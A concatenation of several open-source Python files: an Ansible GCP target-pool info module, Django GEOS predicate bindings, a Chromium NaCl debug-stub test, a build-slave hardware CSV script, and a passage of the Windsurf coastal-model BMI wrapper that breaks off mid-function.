which cannot be a dash.
returned: success
type: str
sessionAffinity:
description:
- 'Session affinity option. Must be one of these values: - NONE: Connections
from the same client IP may go to any instance in the pool.'
- "- CLIENT_IP: Connections from the same client IP will go to the same instance
in the pool while that instance remains healthy."
- "- CLIENT_IP_PROTO: Connections from the same client IP with the same IP protocol
will go to the same instance in the pool while that instance remains healthy."
returned: success
type: str
region:
description:
- The region where the target pool resides.
returned: success
type: str
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest
import json
################################################################################
# Main
################################################################################
def main():
    """Module entry point: fetch matching TargetPools and exit with results."""
    argument_spec = dict(
        filters=dict(type='list', elements='str'),
        region=dict(required=True, type='str'),
    )
    module = GcpModule(argument_spec=argument_spec)

    # Keep supporting the pre-2.9 "facts" alias, with a deprecation notice.
    if module._name == 'gcp_compute_target_pool_facts':
        module.deprecate("The 'gcp_compute_target_pool_facts' module has been renamed to 'gcp_compute_target_pool_info'", version='2.13')

    if not module.params['scopes']:
        module.params['scopes'] = ['https://www.googleapis.com/auth/compute']

    response = fetch_list(module, collection(module), query_options(module.params['filters']))
    # The API nests the resource list under 'items'; default to an empty list.
    items = response.get('items') or []
    module.exit_json(resources=items)
def collection(module):
    """Return the regional targetPools collection URL for this module's params."""
    base = 'https://www.googleapis.com/compute/v1'
    path = 'projects/{project}/regions/{region}/targetPools'.format(**module.params)
    return '%s/%s' % (base, path)
def fetch_list(module, link, query):
    """GET *link* with the given filter *query* and decode the response."""
    session = GcpSession(module, 'compute')
    response = session.get(link, params={'filter': query})
    return return_if_object(module, response)
def query_options(filters):
    """Combine a list of filter expressions into one query string.

    Parameters
    ----------
    filters : list of str or None
        individual filter expressions; multiple filters are ANDed by the API.

    Returns
    -------
    str
        '' for no filters, the single filter verbatim, or the filters
        space-joined with each wrapped in parentheses.
    """
    if not filters:
        return ''

    if len(filters) == 1:
        return filters[0]

    queries = []
    for f in filters:
        # For multiple queries, all queries should have ().
        # (The original `''.join(f)` was a no-op on a string and is removed.)
        if f[0] != '(' and f[-1] != ')':
            queries.append('(%s)' % f)
        else:
            queries.append(f)
    return ' '.join(queries)
def return_if_object(module, response):
    """Decode *response* as JSON, failing the module on API errors.

    Returns None for 404 (not found) and 204 (no content) responses.
    """
    # Nothing to decode for "not found" or "no content" responses.
    if response.status_code in (404, 204):
        return None

    try:
        module.raise_for_status(response)
        result = response.json()
    except getattr(json.decoder, 'JSONDecodeError', ValueError) as inst:
        module.fail_json(msg="Invalid JSON response with error: %s" % inst)

    # Surface any error payload embedded in an otherwise-successful response.
    if navigate_hash(result, ['error', 'errors']):
        module.fail_json(msg=navigate_hash(result, ['error', 'errors']))

    return result
if __name__ == "__main__":
main()
| gpl-3.0 |
alphafoobar/intellij-community | python/lib/Lib/site-packages/django/contrib/gis/geos/prototypes/predicates.py | 623 | 1777 | """
This module houses the GEOS ctypes prototype functions for the
unary and binary predicate operations on geometries.
"""
from ctypes import c_char, c_char_p, c_double
from django.contrib.gis.geos.libgeos import GEOM_PTR
from django.contrib.gis.geos.prototypes.errcheck import check_predicate
from django.contrib.gis.geos.prototypes.threadsafe import GEOSFunc
## Binary & unary predicate functions ##
def binary_predicate(func, *args):
    """Configure *func* as a GEOS predicate on two geometries.

    Extra ctypes argument types (e.g. a tolerance double) may be appended
    via *args*.
    """
    func.restype = c_char
    func.errcheck = check_predicate
    func.argtypes = [GEOM_PTR, GEOM_PTR] + list(args)
    return func
def unary_predicate(func):
    """Configure *func* as a GEOS predicate taking a single geometry."""
    func.restype = c_char
    func.errcheck = check_predicate
    func.argtypes = [GEOM_PTR]
    return func
## Unary Predicates ##
# Each binding wraps the corresponding GEOS C function with the ctypes
# argument/return/errcheck configuration applied by unary_predicate().
geos_hasz = unary_predicate(GEOSFunc('GEOSHasZ'))
geos_isempty = unary_predicate(GEOSFunc('GEOSisEmpty'))
geos_isring = unary_predicate(GEOSFunc('GEOSisRing'))
geos_issimple = unary_predicate(GEOSFunc('GEOSisSimple'))
geos_isvalid = unary_predicate(GEOSFunc('GEOSisValid'))

## Binary Predicates ##
# GEOSEqualsExact takes an extra double (tolerance); GEOSRelatePattern takes
# an extra char* (DE-9IM pattern string).
geos_contains = binary_predicate(GEOSFunc('GEOSContains'))
geos_crosses = binary_predicate(GEOSFunc('GEOSCrosses'))
geos_disjoint = binary_predicate(GEOSFunc('GEOSDisjoint'))
geos_equals = binary_predicate(GEOSFunc('GEOSEquals'))
geos_equalsexact = binary_predicate(GEOSFunc('GEOSEqualsExact'), c_double)
geos_intersects = binary_predicate(GEOSFunc('GEOSIntersects'))
geos_overlaps = binary_predicate(GEOSFunc('GEOSOverlaps'))
geos_relatepattern = binary_predicate(GEOSFunc('GEOSRelatePattern'), c_char_p)
geos_touches = binary_predicate(GEOSFunc('GEOSTouches'))
geos_within = binary_predicate(GEOSFunc('GEOSWithin'))
| apache-2.0 |
ltilve/chromium | chrome/test/data/nacl/debug_stub_browser_tests.py | 97 | 3312 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
import sys
import xml.etree.ElementTree
import gdb_rsp
def GetTargetArch(connection):
    """Return the CPU architecture string reported by the NaCl application."""
    reply = connection.RspRequest('qXfer:features:read:target.xml:0,fff')
    # 'l' marks the last (complete) chunk of the qXfer transfer.
    assert reply[0] == 'l', reply
    xml_root = xml.etree.ElementTree.fromstring(reply[1:])
    node = xml_root.find('architecture')
    assert node is not None, reply
    return node.text.strip()
def ReverseBytes(byte_string):
    """Reverse bytes in the hex string: '09ab' -> 'ab09'. This converts
    little-endian number in the hex string to its normal string representation.
    """
    assert len(byte_string) % 2 == 0, byte_string
    # range() replaces the Python-2-only xrange(); iteration and result are
    # identical, but the helper now also runs under Python 3.
    return ''.join([byte_string[i - 2: i]
                    for i in range(len(byte_string), 0, -2)])
def GetProgCtrString(connection, arch):
    """Get current execution point (program counter) as a hex string."""
    registers = connection.RspRequest('g')
    # Offsets (in hex characters) of the PC within the 'g' register dump.
    # Register indices come from native_client/src/trusted/debug_stub/abi.cc
    # (AbiInit): eip index 8, rip index 16, ARM pc index 15.
    pc_offsets = {
        'i386': 8 * 8,
        'i386:x86-64': 16 * 16,
        'iwmmxt': 15 * 8,
    }
    if arch not in pc_offsets:
        raise AssertionError('Unknown architecture: %s' % arch)
    start = pc_offsets[arch]
    return ReverseBytes(registers[start: start + 8])
def TestContinue(connection):
    """Continue execution and expect the module to be killed on test success."""
    status = connection.RspRequest('vCont;c')
    # Once the NaCl test module reports that the test passed, the <embed>
    # element is removed from the page; the browser then kills the module,
    # which the stub reports as exit due to SIGKILL (X09).
    assert status == 'X09', status
def TestBreakpoint(connection):
    """Exercise breakpoints and single-stepping over the GDB RSP connection.

    The exact sequence of RSP requests is the contract under test; do not
    reorder the calls.
    """
    # Breakpoints and single-stepping might interfere with Chrome sandbox. So we
    # check that they work properly in this test.
    arch = GetTargetArch(connection)
    registers = connection.RspRequest('g')
    pc = GetProgCtrString(connection, arch)
    # Set breakpoint ('Z0' = insert software breakpoint at pc, kind 1)
    result = connection.RspRequest('Z0,%s,1' % pc)
    assert result == 'OK', result
    # Check that we stopped at breakpoint (T05 = SIGTRAP stop reply)
    result = connection.RspRequest('vCont;c')
    stop_reply = re.compile(r'T05thread:(\d+);')
    assert stop_reply.match(result), result
    thread = stop_reply.match(result).group(1)
    # Check that registers haven't changed
    result = connection.RspRequest('g')
    assert result == registers, (result, registers)
    # Remove breakpoint ('z0' = remove software breakpoint)
    result = connection.RspRequest('z0,%s,1' % pc)
    assert result == 'OK', result
    # Check single stepping ('s' on the thread that hit the breakpoint)
    result = connection.RspRequest('vCont;s:%s' % thread)
    assert result == 'T05thread:%s;' % thread, result
    # The step must have advanced the program counter.
    assert pc != GetProgCtrString(connection, arch)
    # Check that we terminate normally (X09 = killed when <embed> is removed)
    result = connection.RspRequest('vCont;c')
    assert result == 'X09', result
def Main(args):
    """Connect to the debug stub on localhost and run the named sub-test."""
    port = int(args[0])
    test_name = args[1]
    connection = gdb_rsp.GdbRspConnection(('localhost', port))
    tests = {
        'continue': TestContinue,
        'breakpoint': TestBreakpoint,
    }
    if test_name not in tests:
        raise AssertionError('Unknown test name: %r' % test_name)
    tests[test_name](connection)
if __name__ == '__main__':
Main(sys.argv[1:])
| bsd-3-clause |
benschmaus/catapult | common/lab/hardware.py | 11 | 2477 | #!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Query build slave hardware info, and print it to stdout as csv."""
import csv
import json
import logging
import sys
import urllib2
_MASTERS = [
'chromium.perf',
'chromium.perf.fyi',
'client.catapult',
'tryserver.chromium.perf',
'tryserver.client.catapult',
]
_KEYS = [
'master', 'builder', 'hostname',
'os family', 'os version', 'bitness (userland)',
'product name', 'architecture', 'processor count', 'processor type',
'memory total',
'facter version', 'git version', 'puppet version', 'python version',
'ruby version',
'android device 1', 'android device 2', 'android device 3',
'android device 4', 'android device 5', 'android device 6',
'android device 7', 'android device 8',
]
_EXCLUDED_KEYS = frozenset([
'architecture (userland)',
'b directory',
'last puppet run',
'uptime',
'windows version',
])
def main():
  """Fetch slave hardware info from each buildbot master and emit CSV."""
  writer = csv.DictWriter(sys.stdout, _KEYS)
  writer.writeheader()
  for master_name in _MASTERS:
    # Buildbot JSON endpoint listing all slaves attached to this master.
    master_data = json.load(urllib2.urlopen(
        'http://build.chromium.org/p/%s/json/slaves' % master_name))
    # Sort by builder list first, then hostname, for stable output.
    slaves = sorted(master_data.iteritems(),
                    key=lambda x: (x[1]['builders'].keys(), x[0]))
    for slave_name, slave_data in slaves:
      for builder_name in slave_data['builders']:
        row = {
            'master': master_name,
            'builder': builder_name,
            'hostname': slave_name,
        }
        # 'host' is a free-form multi-line "key: value" blob; a single-line
        # value carries no parseable fields and is skipped.
        host_data = slave_data['host']
        if host_data:
          host_data = host_data.splitlines()
          if len(host_data) > 1:
            for line in host_data:
              if not line:
                continue
              # NOTE(review): assumes values never contain ': ' themselves —
              # a value with a colon-space would raise ValueError here.
              key, value = line.split(': ')
              if key in _EXCLUDED_KEYS:
                continue
              row[key] = value
        # Munge keys: underscores become spaces to match _KEYS column names.
        row = {key.replace('_', ' '): value for key, value in row.iteritems()}
        if 'osfamily' in row:
          row['os family'] = row.pop('osfamily')
        if 'product name' not in row and slave_name.startswith('slave'):
          row['product name'] = 'Google Compute Engine'
        try:
          writer.writerow(row)
        except ValueError:
          # DictWriter raises ValueError on fields missing from _KEYS;
          # log the offending row before propagating.
          logging.error(row)
          raise
if __name__ == '__main__':
main()
| bsd-3-clause |
openearth/windsurf | windsurf/model.py | 1 | 27033 | import os
import re
import imp
import time
import json
import shutil
import logging
import traceback
import importlib
import numpy as np
import cPickle as pickle
from bmi.api import IBmi
from bmi.wrapper import BMIWrapper
from multiprocessing import Process
import netcdf, parsers
# initialize log
logger = logging.getLogger(__name__)
class WindsurfWrapper:
'''Windsurf class
Main class for Windsurf model. Windsurf is a composite model for
simulating integrated nearshore and aeolian sediment transport.
'''
regime = None
def __init__(self, configfile=None, restartfile=None):
'''Initialize the class
Parameters
----------
configfile : str
path to JSON configuration file, see
:func:`~windsurf.model.Windsurf.load_configfile`
restartfile : str
path to Pickle restart file
'''
self.configfile = configfile
self.restartfile = restartfile
self.restart = restartfile is not None
def run(self, callback=None, subprocess=True):
'''Spawn model time loop'''
if subprocess:
p = Process(target=self.start,
args=(callback,))
p.start()
p.join()
else:
self.start(callback)
    def start(self, callback=None):
        '''Start model time loop.

        Initializes the composite engine, restores a restart dump if one was
        given, then steps the engine until the configured stop time, writing
        output and logging progress along the way.
        '''
        # parse callback
        callback = self.parse_callback(callback)

        self.engine = Windsurf(configfile=self.configfile)
        self.engine.initialize()

        # bookkeeping counters: simulation time, update count, output index
        self.t = 0
        self.i = 0
        self.iout = 0

        self.tlog = 0.0    # in real-world time
        self.tlast = 0.0   # in simulation time
        self.tstart = time.time()  # in real-world time
        self.tstop = self.engine.get_end_time()  # in simulation time

        self.output_init()
        if self.restart:
            self.load_restart_file()
        else:
            # write the initial state as the first output record
            self.output()

        while self.t < self.tstop:
            # the callback may inspect/modify the engine before each step
            if callback is not None:
                callback(self.engine)

            self.set_regime()
            self.engine.update()
            self.t = self.engine.get_current_time()
            self.i += 1
            self.output()
            self.progress()
            # tlast must be updated after output()/progress(), which compare
            # the current time against it
            self.tlast = self.t

        self.engine.finalize()
        logger.debug('End of simulation')
    def set_regime(self):
        '''Set model settings according to current regime.

        Checks which regime should be currently active. If the regime
        is changed, the corresponding model parameters are set.
        '''
        regimes = self.engine.get_config_value('regimes')
        scenario = self.engine.get_config_value('scenario')

        # scenario is a list of (start_time, regime_name) pairs; pick the
        # last entry whose start time has passed
        times = np.asarray([s[0] for s in scenario])
        idx = np.where(times <= self.t)[0].max()
        # NOTE(review): idx comes from an index into `times` and can never
        # reach len(scenario); this guard looks unreachable — confirm intent.
        if idx >= len(scenario):
            logger.warning("Scenario too short, reusing last regime!")
            idx = len(scenario)-1

        # only push parameters to the engines on an actual regime switch
        if scenario[idx][1] != self.regime:
            self.regime = scenario[idx][1]
            logger.info('Switched to regime "%s"' % self.regime)
            for engine, variables in regimes[self.regime].iteritems():
                for name, value in variables.iteritems():
                    logger.debug('Set parameter "%s" in engine "%s" to "%s"' % (name,
                                                                                engine,
                                                                                value))
                    self.engine.set_var('%s.%s' % (engine, name), np.asarray(value))
def parse_callback(self, callback):
'''Parses callback definition and returns function
The callback function can be specified in two formats:
- As a native Python function
- As a string refering to a Python script and function,
separated by a colon (e.g. ``example/callback.py:function``)
Parameters
----------
callback : str or function
Callback definition
Returns
-------
function
Python callback function
'''
if isinstance(callback, str):
if ':' in callback:
fname, func = callback.split(':')
if os.path.exists(fname):
mod = imp.load_source('callback', fname)
if hasattr(mod, func):
return getattr(mod, func)
elif hasattr(callback, '__call__'):
return callback
elif callback is None:
return callback
logger.warn('Invalid callback definition [%s]' % callback)
return None
    def output_init(self):
        '''Initialize netCDF4 output file.

        Creates an empty netCDF4 output file with the necessary
        dimensions, variables, attributes and coordinate reference
        system specification (crs).
        '''
        outputfile = self.engine.get_config_value('netcdf', 'outputfile')
        outputvars = self.engine.get_config_value('netcdf', 'outputvars')
        attributes = self.engine.get_config_value('netcdf', 'attributes')
        crs = self.engine.get_config_value('netcdf', 'crs')

        if outputfile is not None and outputvars is not None:
            # on a restart run an existing output file is reused, not clobbered
            if not self.restart or not os.path.exists(outputfile):
                logger.debug('Initializing output...')

                # get dimension names for each variable
                variables = {
                    v : { 'dimensions' : self.engine.get_dimensions(v) }
                    for v in outputvars
                }

                for v in variables.iterkeys():
                    logger.info('Creating netCDF output for "%s"' % v)

                netcdf.initialize(outputfile,
                                  self.read_dimensions(),
                                  variables=variables,
                                  attributes=attributes,
                                  crs=crs)
    def output(self):
        '''Write model data to netCDF4 output file.

        Also dumps a restart file (and optionally a backup of the output
        file) whenever a configured restart time was crossed since the
        previous step.
        '''
        # dump restart and/or backup file if requested
        times = self.engine.get_config_value('restart', 'times')
        if times is not None:
            tr = np.asarray(times)
            # trigger when a restart time lies in the (tlast, t] interval
            if self.tlast > 0. and np.any((tr <= self.t) & (tr > self.tlast)):
                self.dump_restart_file()
                if self.engine.get_config_value('restart', 'backup'):
                    self.create_backup()

        # write output if requested: true whenever an output interval
        # boundary was crossed during the last step
        if np.mod(self.t, self.engine.tout) < self.t - self.tlast:
            outputfile = self.engine.get_config_value('netcdf', 'outputfile')
            outputvars = self.engine.get_config_value('netcdf', 'outputvars')

            if outputfile is not None and outputvars is not None:
                logger.debug('Writing output at t=%0.2f...' % self.t)

                # get dimension data for each variable
                variables = {v : self.engine.get_var(v) for v in outputvars}
                variables['time'] = self.t

                netcdf.append(outputfile,
                              idx=self.iout,
                              variables=variables)

                self.iout += 1
    def load_restart_file(self):
        '''Load restart file from previous run.

        Restores simulation time, counters and the dumped engine variables
        from the Pickle file given at construction time.
        '''
        if os.path.exists(self.restartfile):
            # NOTE(review): text-mode 'r' works for Python 2 pickles only;
            # Python 3 would need 'rb' — confirm target interpreter.
            with open(self.restartfile, 'r') as fp:
                dump = pickle.load(fp)

            # a negative time step fast-forwards the engines to the dump time
            self.engine.update(-dump['time'])
            self.t = self.engine.get_current_time()
            self.tlast = self.t
            self.iout = dump['iout']
            self.i = dump['i']

            # push the dumped variables back into the individual engines
            for engine, variables in dump['data'].iteritems():
                for var, val in variables.iteritems():
                    self.engine.set_var('%s.%s' % (engine, var), val)

            logger.info('Loaded restart file "%s".' % self.restartfile)
        else:
            logger.error('Restart file "%s" not found' % self.restartfile)
    def dump_restart_file(self):
        '''Dump restart file to start next run.

        Writes simulation time, counters and the configured restart
        variables to ``restart.<t>.pkl``; existing files are left untouched.
        '''
        fname = 'restart.%d.pkl' % self.t
        if not os.path.exists(fname):
            variables = self.engine.get_config_value('restart', 'variables')
            if variables is not None:
                dump = {
                    'time' : self.t,
                    'iout' : self.iout,
                    'i' : self.i,
                    'data' : {}
                }

                # one sub-dict per model engine
                for model in self.engine.models.iterkeys():
                    dump['data'][model] = {}

                # read each "engine.var" value and file it under its engine
                for var in variables:
                    val = self.engine.get_var(var)
                    engine, var = self.engine._split_var(var)
                    dump['data'][engine][var] = val

                with open(fname, 'w') as fp:
                    pickle.dump(dump, fp)

                logger.info('Written restart file "%s".' % fname)
def create_backup(self):
'''Create backup file of output file'''
logger.info('Creating backup file...')
outputfile = self.engine.get_config_value('netcdf', 'outputfile')
if outputfile is not None:
shutil.copyfile(outputfile, '%s~' % outputfile)
    def read_dimensions(self):
        '''Read dimensions of composite domain.

        Parses individual model engine configuration files and read
        information regarding the dimensions of the composite domain,
        like the bathymetric grid, number of sediment fractions and
        number of bed layers.

        Returns
        -------
        dict
            dictionary with dimension variables ('x', 'y', 'layers',
            'fractions'), each guaranteed to be a sequence
        '''
        dimensions = {}

        if self.engine.models.has_key('xbeach'):
            cfg_xbeach = parsers.XBeachParser(
                self.engine.models['xbeach']['configfile']).parse()
        else:
            cfg_xbeach = {}
        if self.engine.models.has_key('aeolis'):
            cfg_aeolis = parsers.AeolisParser(
                self.engine.models['aeolis']['configfile']).parse()
        else:
            cfg_aeolis = {}

        # x and y: prefer the XBeach grid, fall back to the AeoLiS grid;
        # grids are stored flat and reshaped to (ny+1, nx+1)
        if len(cfg_xbeach) > 0:
            dimensions['x'] = cfg_xbeach['xfile'].reshape(
                (cfg_xbeach['ny']+1,
                 cfg_xbeach['nx']+1))[0,:]
            dimensions['y'] = cfg_xbeach['yfile'].reshape(
                (cfg_xbeach['ny']+1,
                 cfg_xbeach['nx']+1))[:,0]
        elif len(cfg_aeolis) > 0:
            dimensions['x'] = cfg_aeolis['xgrid_file'].reshape(
                (cfg_aeolis['ny']+1,
                 cfg_aeolis['nx']+1))[0,:]
            dimensions['y'] = cfg_aeolis['ygrid_file'].reshape(
                (cfg_aeolis['ny']+1,
                 cfg_aeolis['nx']+1))[:,0]
        else:
            dimensions['x'] = []
            dimensions['y'] = []

        # layers and fractions: only AeoLiS carries bed composition info
        if len(cfg_aeolis) > 0:
            dimensions['layers'] = np.arange(cfg_aeolis['nlayers']) * \
                cfg_aeolis['layer_thickness']
            dimensions['fractions'] = cfg_aeolis['grain_size'][:cfg_aeolis['nfractions']]
        else:
            dimensions['layers'] = []
            dimensions['fractions'] = []

        # ensure lists: wrap any scalar value in a single-item list
        # NOTE(review): the bare except silently converts any len() failure;
        # it is intended for scalars only.
        for k, v in dimensions.iteritems():
            try:
                len(v)
            except:
                dimensions[k] = [v]

        return dimensions
def progress(self, frac=.1):
'''Log progress
Parameters
----------
frac : float
log interval as fraction of simulation time
'''
if (np.mod(self.t, self.tstop * frac) < self.t - self.tlast or \
time.time() - self.tlog > 60.):
p = min(1, self.t / self.tstop)
dt1 = time.time() - self.tstart
dt2 = dt1 / p
dt3 = dt2 * (1-p)
fmt = '[%5.1f%%] %s / %s / %s (avg. dt=%5.3f)'
if p <= 1:
logger.info(fmt % (p*100.,
time.strftime('%H:%M:%S', time.gmtime(dt1)),
time.strftime('%H:%M:%S', time.gmtime(dt2)),
time.strftime('%H:%M:%S', time.gmtime(dt3)),
self.t / self.i))
self.tlog = time.time()
class Windsurf(IBmi):
'''Windsurf BMI class
BMI compatible class for calling the Windsurf composite model.
'''
t = 0.0
    def __init__(self, configfile=None):
        '''Initialize the class.

        Parameters
        ----------
        configfile : str
            path to JSON configuration file, see
            :func:`~windsurf.model.Windsurf.load_configfile`

        Raises
        ------
        IOError
            if the configuration file does not exist
        '''
        self.configfile = configfile
        # parse the configuration immediately; this also chdirs to the
        # configuration file's directory
        self.load_configfile()
    def __enter__(self):
        '''Context-manager entry: initialize all model engines.'''
        self.initialize()
        return self
    def __exit__(self, errtype, errobj, traceback):
        '''Context-manager exit: finalize engines, then re-raise any error.

        Parameters
        ----------
        errtype : type
            type representation of exception class
        errobj : Exception
            exception object
        traceback : traceback
            traceback stack
        '''
        self.finalize()
        # engines are finalized even on error; the exception is then
        # propagated explicitly
        if errobj:
            raise errobj
    def load_configfile(self):
        '''Load configuration file.

        A JSON configuration file may contain the following:

        .. literalinclude:: ../example/windsurf.json
           :language: json

        See for more information section :ref:`configuration`.

        Raises
        ------
        IOError
            if the configuration file does not exist
        '''
        if os.path.exists(self.configfile):

            # store current working directory
            self.cwd = os.getcwd()

            # change working directory to location of configuration file,
            # so that relative paths inside the configuration resolve
            if not os.path.isabs(self.configfile):
                self.configfile = os.path.abspath(self.configfile)
            fpath, fname = os.path.split(self.configfile)
            os.chdir(fpath)
            logger.debug('Changed directory to "%s"' % fpath)

            with open(fname, 'r') as fp:
                self.config = json.load(fp)

            # cache the most frequently used configuration values
            self.tstart = self.get_config_value('time', 'start')
            self.tstop = self.get_config_value('time', 'stop')
            self.tout = self.get_config_value('netcdf', 'interval')
            self.models = self.get_config_value('models')

        else:
            raise IOError('File not found: %s' % self.configfile)
    def get_current_time(self):
        '''Return current model time (mean over all engines).'''
        return self.t
    def get_end_time(self):
        '''Return model stop time (from the "time" configuration section).'''
        return self.tstop
    def get_start_time(self):
        '''Return model start time (from the "time" configuration section).'''
        return self.tstart
    def get_var(self, name):
        '''Return array from model engine.

        *name* has the form ``"<engine>.<variable>"``. A copy is returned
        so callers cannot mutate engine-internal state.
        '''
        engine, name = self._split_var(name)
        return self.models[engine]['_wrapper'].get_var(name).copy()
def get_var_count(self):
raise NotImplemented(
'BMI extended function "get_var_count" is not implemented yet')
def get_var_name(self, i):
raise NotImplemented(
'BMI extended function "get_var_name" is not implemented yet')
    def get_var_rank(self, name):
        '''Return array rank or 0 for scalar.

        *name* has the form ``"<engine>.<variable>"``.
        '''
        engine, name = self._split_var(name)
        return self.models[engine]['_wrapper'].get_var_rank(name)
    def get_var_shape(self, name):
        '''Return array shape.

        *name* has the form ``"<engine>.<variable>"``.
        '''
        engine, name = self._split_var(name)
        return self.models[engine]['_wrapper'].get_var_shape(name)
    def get_var_type(self, name):
        '''Return type string, compatible with numpy.

        *name* has the form ``"<engine>.<variable>"``.
        '''
        engine, name = self._split_var(name)
        return self.models[engine]['_wrapper'].get_var_type(name)
def inq_compound(self, name):
raise NotImplemented(
'BMI extended function "inq_compound" is not implemented yet')
def inq_compound_field(self, name):
raise NotImplemented(
'BMI extended function "inq_compound_field" is not implemented yet')
    def set_var(self, name, value):
        '''Set array in model engine.

        *name* has the form ``"<engine>.<variable>"``.
        '''
        engine, name = self._split_var(name)
        self.models[engine]['_wrapper'].set_var(name, value)
def set_var_index(self, name, index, value):
raise NotImplemented(
'BMI extended function "set_var_index" is not implemented yet')
def set_var_slice(self, name, start, count, value):
raise NotImplemented(
'BMI extended function "set_var_slice" is not implemented yet')
    def initialize(self):
        '''Initialize model engines and configuration.

        For each configured model, loads its engine either as an external
        BMI library or, failing that, as a Python package, then calls the
        engine's own ``initialize()``.
        '''
        # initialize model engines
        for name, props in self.models.iteritems():
            logger.info('Loading library "%s"...' % name)

            # support local engines: make the engine's directory visible to
            # the dynamic loader before instantiating the wrapper
            if props.has_key('engine_path') and \
               props['engine_path'] and \
               os.path.isabs(props['engine_path']) and \
               os.path.exists(props['engine_path']):
                logger.debug('Adding library "%s" to path...' % props['engine_path'])
                os.environ['LD_LIBRARY_PATH'] = props['engine_path']
                os.environ['DYLD_LIBRARY_PATH'] = props['engine_path'] # Darwin

            # initialize bmi wrapper
            try:
                # try external library
                self.models[name]['_wrapper'] = BMIWrapper(
                    engine=props['engine'],
                    configfile=props['configfile'] or ''
                )
            except RuntimeError:
                # try python package: "pkg.Class" is split into module path
                # and class name
                try:
                    p, c = props['engine'].rsplit('.', 1)
                    mod = importlib.import_module(p)
                    engine = getattr(mod, c)
                    self.models[name]['_wrapper'] = engine(configfile=props['configfile'] or '')
                except:
                    raise RuntimeError('Engine not found [%s]' % props['engine'])

            # initialize per-engine simulation clock
            self.models[name]['_time'] = self.t

            # initialize model engine
            self.models[name]['_wrapper'].initialize()
def update(self, dt=-1):
'''Step model engines into the future
Step all model engines into the future and check if engines
are at the same point in time. If not, repeat stepping into
the future of lagging engines until all engines are
(approximately) at the same point in time. Exchange data if
necessary.
Parameters
----------
dt : float
time step, use -1 for automatic time step
'''
t0 = self.t
target_time = None
engine_last = None
for engine in self.models.iterkeys():
self.models[engine]['_target'] = None
# repeat update until target time step is reached for all engines
while target_time is None or np.any([m['_time'] < target_time
for m in self.models.itervalues()]):
# determine model engine with maximum lag
engine = self._get_engine_maxlag()
e = self.models[engine]
now = e['_time']
# exchange data if another model engine is selected
try:
if engine != engine_last:
self._exchange_data(engine)
except:
logger.error('Failed to exchange data from "%s" to "%s"!' % (engine_last, engine))
logger.error(traceback.format_exc())
# step model engine in future
try:
e['_wrapper'].update(dt)
except:
logger.error('Failed to update "%s"!' % engine)
logger.error(traceback.format_exc())
# update time
e['_time'] = e['_wrapper'].get_current_time()
e['_target'] = e['_time']
logger.debug(
'Step engine "%s" from t=%0.2f to t=%0.2f into the future...' % (
engine,
now,
e['_time']))
# determine target time step after first update
if target_time is None and \
np.all([m['_target'] is not None for m in self.models.itervalues()]):
target_time = np.max([m['_time'] for m in self.models.itervalues()])
logger.debug('Set target time step to t=%0.2f' % target_time)
engine_last = engine
self.t = np.mean([m['_time'] for m in self.models.itervalues()])
logger.debug('Arrived in future at t=%0.2f' % self.t)
def finalize(self):
'''Finalize model engines'''
# finalize model engines
for name, props in self.models.iteritems():
self.models[name]['_wrapper'].finalize()
def _exchange_data(self, engine):
'''Exchange data from all model engines to a given model engine
Reads exchange configuration and looks for items where the
given model engine is in the "var_to" field and reads the
corresponding "var_from" variable from the model engine
specified by the "var_to" variable.
Parameters
----------
engine : str
model engine to write data to
'''
exchange = self.get_config_value('exchange')
if exchange is not None:
for ex in exchange:
engine_to, var_to = self._split_var(ex['var_to'])
engine_from, var_from = self._split_var(ex['var_from'])
if engine_to == engine:
logger.debug('Exchange "%s" to "%s"' % (
ex['var_from'],
ex['var_to']))
try:
val = self.models[engine_from]['_wrapper'].get_var(var_from)
except:
logger.error('Failed to get "%s" from "%s"!' % (var_from, engine_from))
logger.error(traceback.format_exc())
try:
self.models[engine_to]['_wrapper'].set_var(var_to, val)
except:
logger.error('Failed to set "%s" in "%s"!' % (var_to, engine_to))
logger.error(traceback.format_exc())
def _get_engine_maxlag(self):
'''Get model engine with maximum lag from current time
Returns
-------
str
name of model engine with larges lag
'''
lag = np.inf
engine = None
for name, props in self.models.iteritems():
if props['_time'] < lag:
lag = props['_time']
engine = name
return engine
def _split_var(self, name):
'''Split variable name in engine and variable part
Split a string into two strings where the first string is the
name of the model engine that holds the variable and the
second is the variable name itself. If the original string
contains a dot (.) the left and right side of the dot are
chosen as the engine and variable name respectively. If the
original string contains no dot the default engine is chosen
for the given variable name. If no default engine is defined
for the given variable name a ValueError is raised.
Parameters
----------
name : str
name of variable, including engine
Returns
-------
str
name of model engine
str
name of variable
Examples
--------
>>> self._split_var('xbeach.zb')
('xbeach', 'zb')
>>> self._split_var('zb')
('xbeach', 'zb')
>>> self._split_var('aeolis.zb')
('aeolis', 'zb')
>>> self._split_var('aeolis.Ct')
('aeolis', 'Ct')
>>> self._split_var('Ct')
('aeolis', 'Ct')
>>> self._split_var('aeolis.Ct.avg')
('aeolis', 'Ct.avg')
'''
parts = name.split('.')
engine = None
name = None
if len(parts) == 1:
name = parts[0]
elif len(parts) == 2:
if parts[0] in self.models.keys():
engine, name = parts
else:
name = '.'.join(parts)
else:
engine = parts[0]
name = '.'.join(parts)
if engine is None:
if name.split('.')[0] in ['Cu', 'Ct', 'supply', 'pickup', 'mass', 'uth',
'uw', 'uws', 'uwn', 'udir']:
engine = 'aeolis'
elif name.split('.')[0] in ['zb', 'zs', 'zs0', 'H']:
engine = 'xbeach'
else:
raise ValueError(
'Unknown variable "%s", specify engine using "<engine>.%s"' % (
name, name))
return engine, name
def get_config_value(self, *keys, **kwargs):
'''Get configuration values by traversing JSON structure while checking existence
Parameters
----------
keys : str
traverse into JSON configuration structure
Return
------
value form JSON configuration file or (partial) structure or None if non-existent
'''
if kwargs.has_key('cfg'):
cfg = kwargs['cfg']
else:
cfg = None
if cfg is None:
cfg = self.config
if len(keys) > 0:
if cfg.has_key(keys[0]):
cfg = self.get_config_value(*keys[1:], cfg=cfg[keys[0]])
else:
cfg = None
return cfg
@staticmethod
def get_dimensions(var):
var = var.split('.')[0]
if var in ['mass']:
dims = (u'time', u'y', u'x', u'layers', u'fractions')
elif var in ['d10', 'd50', 'd90', 'moist', 'thlyr']:
dims = (u'time', u'y', u'x', u'layers')
